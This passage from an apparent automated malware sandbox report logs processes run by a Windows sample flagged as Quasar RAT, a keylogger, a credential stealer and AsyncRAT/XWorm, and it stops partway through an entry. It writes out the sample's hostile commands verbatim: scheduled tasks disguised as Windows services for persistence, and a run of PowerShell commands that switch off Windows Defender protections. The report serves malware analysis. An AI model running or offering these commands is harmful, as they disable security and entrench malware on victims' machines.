                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Vermin, Description: Yara detected Vermin Keylogger, Source: 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Quasarrat_e52df647, Description: unknown, Source: 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Vermin, Description: Yara detected Vermin Keylogger, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Joe Security
                                                  • Rule: Windows_Trojan_Quasarrat_e52df647, Description: unknown, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: unknown
                                                  • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Florian Roth
                                                  • Rule: Quasar_RAT_2, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Florian Roth
                                                  • Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Florian Roth
                                                  • Rule: Vermin_Keylogger_Jan18_1, Description: Detects Vermin Keylogger, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Florian Roth
                                                  • Rule: xRAT_1, Description: Detects Patchwork malware, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Florian Roth
                                                  • Rule: CN_disclosed_20180208_KeyLogger_1, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Florian Roth
                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Florian Roth
                                                  • Rule: INDICATOR_SUSPICIOUS_DisableWinDefender, Description: Detects executables containing artifacts associated with disabling Windows Defender, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: ditekSHen
                                                  • Rule: MALWARE_Win_QuasarRAT, Description: QuasarRAT payload, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: ditekSHen
                                                  Antivirus matches:
                                                  • Detection: 100%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:7
                                                  Start time:00:15:54
                                                  Start date:03/09/2024
                                                  Path:C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe"
                                                  Imagebase:0xf60000
                                                  File size:44'032 bytes
                                                  MD5 hash:5322A12CB24E83BFA9746FBDE06D07E7
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000007.00000000.2009427541.0000000000F62000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000000.2009427541.0000000000F62000.00000002.00000001.01000000.0000000C.sdmp, Author: ditekSHen
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe, Author: ditekSHen
                                                  Antivirus matches:
                                                  • Detection: 81%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:8
                                                  Start time:00:15:57
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"' & exit
                                                  Imagebase:0x7ff7b77f0000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:9
                                                  Start time:00:15:57
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:10
                                                  Start time:00:15:57
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE306.tmp.bat""
                                                  Imagebase:0x7ff7b77f0000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:11
                                                  Start time:00:15:57
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:12
                                                  Start time:00:15:57
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"'
                                                  Imagebase:0x7ff6078f0000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:13
                                                  Start time:00:15:57
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"schtasks" /create /tn "Windows Update" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\Window Security.exe" /rl HIGHEST /f
                                                  Imagebase:0xa00000
                                                  File size:187'904 bytes
                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:14
                                                  Start time:00:15:57
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:15
                                                  Start time:00:15:57
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\timeout.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:timeout 3
                                                  Imagebase:0x7ff76b1a0000
                                                  File size:32'768 bytes
                                                  MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:16
                                                  Start time:00:15:57
                                                  Start date:03/09/2024
                                                  Path:C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe"
                                                  Imagebase:0x1e0000
                                                  File size:547'328 bytes
                                                  MD5 hash:81B2C5C64951B603480D40D321540FF2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Vermin, Description: Yara detected Vermin Keylogger, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Joe Security
                                                  • Rule: Windows_Trojan_Quasarrat_e52df647, Description: unknown, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: unknown
                                                  • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Florian Roth
                                                  • Rule: Quasar_RAT_2, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Florian Roth
                                                  • Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Florian Roth
                                                  • Rule: Vermin_Keylogger_Jan18_1, Description: Detects Vermin Keylogger, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Florian Roth
                                                  • Rule: xRAT_1, Description: Detects Patchwork malware, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Florian Roth
                                                  • Rule: CN_disclosed_20180208_KeyLogger_1, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Florian Roth
                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Florian Roth
                                                  • Rule: INDICATOR_SUSPICIOUS_DisableWinDefender, Description: Detects executables containing artifacts associated with disabling Windows Defender, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: ditekSHen
                                                  • Rule: MALWARE_Win_QuasarRAT, Description: QuasarRAT payload, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: ditekSHen
                                                  Antivirus matches:
                                                  • Detection: 100%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:17
                                                  Start time:00:15:57
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"powershell" Get-MpPreference -verbose
                                                  Imagebase:0xa30000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:18
                                                  Start time:00:15:57
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:19
                                                  Start time:00:15:57
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE49C.tmp.cmd""
                                                  Imagebase:0x790000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:20
                                                  Start time:00:15:57
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:21
                                                  Start time:00:15:58
                                                  Start date:03/09/2024
                                                  Path:C:\Users\user\AppData\Roaming\Windows Security Health Service.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"
                                                  Imagebase:0xb60000
                                                  File size:75'776 bytes
                                                  MD5 hash:0DFA83A82F6418C73406D78296DE61BE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe, Author: Joe Security
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attempting to enumerate video devices using WMI, Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe, Author: ditekSHen
                                                  Antivirus matches:
                                                  • Detection: 87%, ReversingLabs
                                                  Has exited:true

                                                  Target ID:22
                                                  Start time:00:15:58
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender Service Host" /tr "C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe"
                                                  Imagebase:0x7ff6078f0000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:23
                                                  Start time:00:15:59
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:24
                                                  Start time:00:15:59
                                                  Start date:03/09/2024
                                                  Path:C:\Users\user\AppData\Roaming\Window Security.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Roaming\Window Security.exe"
                                                  Imagebase:0xa80000
                                                  File size:547'328 bytes
                                                  MD5 hash:81B2C5C64951B603480D40D321540FF2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:25
                                                  Start time:00:16:00
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:timeout 4
                                                  Imagebase:0xdc0000
                                                  File size:25'088 bytes
                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:26
                                                  Start time:00:16:01
                                                  Start date:03/09/2024
                                                  Path:C:\Users\user\AppData\Roaming\Windows Security Health Service.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"
                                                  Imagebase:0xb30000
                                                  File size:75'776 bytes
                                                  MD5 hash:0DFA83A82F6418C73406D78296DE61BE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Target ID:27
                                                  Start time:00:16:01
                                                  Start date:03/09/2024
                                                  Path:C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe"
                                                  Imagebase:0x10000
                                                  File size:44'032 bytes
                                                  MD5 hash:5322A12CB24E83BFA9746FBDE06D07E7
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:28
                                                  Start time:00:16:02
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"schtasks" /create /tn "Windows Update" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe" /rl HIGHEST /f
                                                  Imagebase:0xa00000
                                                  File size:187'904 bytes
                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:29
                                                  Start time:00:16:03
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:31
                                                  Start time:00:16:07
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
                                                  Imagebase:0xa30000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:32
                                                  Start time:00:16:07
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:33
                                                  Start time:00:16:08
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
                                                  Imagebase:0xa30000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:34
                                                  Start time:00:16:08
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:35
                                                  Start time:00:16:08
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
                                                  Imagebase:0xa30000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:36
                                                  Start time:00:16:08
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:37
                                                  Start time:00:16:08
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
                                                  Imagebase:0xa30000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:38
                                                  Start time:00:16:08
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:39
                                                  Start time:00:16:08
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
                                                  Imagebase:0xa30000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:40
                                                  Start time:00:16:08
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:41
                                                  Start time:00:16:08
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                                                  Imagebase:0xa30000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:42
                                                  Start time:00:16:08
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:43
                                                  Start time:00:16:08
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                                                  Imagebase:0xa30000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:44
                                                  Start time:00:16:08
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:45
                                                  Start time:00:16:08
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
                                                  Imagebase:0xa30000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:46
                                                  Start time:00:16:08
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:47
                                                  Start time:00:16:08
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
                                                  Imagebase:0xa30000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:48
                                                  Start time:00:16:08
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:49
                                                  Start time:00:16:08
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
                                                  Imagebase:0xa30000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:50
                                                  Start time:00:16:09
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:51
                                                  Start time:00:16:09
